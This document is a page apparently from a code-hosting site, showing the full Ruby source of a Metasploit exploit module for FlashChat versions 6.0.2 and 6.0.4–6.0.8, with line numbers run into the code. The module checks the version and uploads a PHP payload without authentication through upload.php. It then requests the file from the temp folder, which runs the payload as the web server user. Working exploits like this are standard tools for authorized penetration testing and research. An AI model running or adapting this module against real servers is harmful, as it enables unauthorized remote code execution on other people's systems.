Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/webapp/flashchat_upload_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::EXE10include Msf::Exploit::FileDropper1112def initialize(info={})13super(update_info(info,14'Name' => "FlashChat Arbitrary File Upload",15'Description' => %q{16This module exploits a file upload vulnerability found in FlashChat17versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload18feature in order to upload malicious PHP files without authentication19which results in arbitrary remote code execution as the web server user.20},21'License' => MSF_LICENSE,22'Author' =>23[24'x-hayben21', # Discovery and PoC25'bcoles' # Metasploit26],27'References' =>28[29['OSVDB', '98233'],30['EDB', '28709']31],32'Payload' =>33{34'BadChars' => "\x00"35},36'Arch' => ARCH_PHP,37'Platform' => 'php',38'Targets' =>39[40# Tested on FlashChat version 6.0.841[ 'Generic (PHP Payload)', {} ]42],43'Privileged' => false,44'DisclosureDate' => '2013-10-04',45'DefaultTarget' => 0))4647register_options(48[49OptString.new('TARGETURI', [true, 'The base path to FlashChat', '/chat/'])50])51end5253#54# Checks if target is running FlashChat versions 6.0.2, 6.0.4 to 6.0.855#56def check57uri = normalize_uri(target_uri.path, '')58res = send_request_raw({'uri' => uri})5960if not res61vprint_error("Connection timed out")62return Exploit::CheckCode::Unknown63end6465version = res.body.scan(/<title>FlashChat v([\d\.]+)/).flatten[0] || ''6667if version.empty?68return Exploit::CheckCode::Unknown69end7071vprint_status("Version found: #{version}")7273if version =~ /6\.0\.(2|4|5|6|7|8)/74return Exploit::CheckCode::Appears75elsif version <= "6.0.8"76return Exploit::CheckCode::Detected77else78return Exploit::CheckCode::Safe79end8081end828384#85# Uploads our malicious file86# Stolen from havalite_upload_exec.rb87#88def upload(base)89fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"90php = "<?php #{payload.encoded} ?>"91data = Rex::MIME::Message.new92data.add_part(php, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{fname}\"")93post_data = data.to_s9495res = send_request_cgi({96'method' => 'POST',97'uri' => normalize_uri(base, 'upload.php'),98'ctype' => "multipart/form-data; boundary=#{data.bound}",99'data' => post_data100})101102if not res103fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")104elsif res.code.to_i == 404105fail_with(Failure::NotFound, "#{peer} - No upload.php found")106elsif res.code.to_i == 500107fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")108end109110return fname111end112113114#115# Executes our uploaded malicious file116# Stolen from havalite_upload_exec.rb117#118def exec(base, payload_fname)119res = send_request_raw({120'uri' => normalize_uri(base, 'temp', payload_fname)121})122123if res and res.code == 404124fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")125end126end127128def exploit129base = target_uri.path130131# upload132print_status("Uploading malicious file...")133fname = upload(base)134135# register the file to clean136register_files_for_cleanup(fname)137138# exec139print_status("Executing #{fname}...")140exec(base, fname)141end142end143144145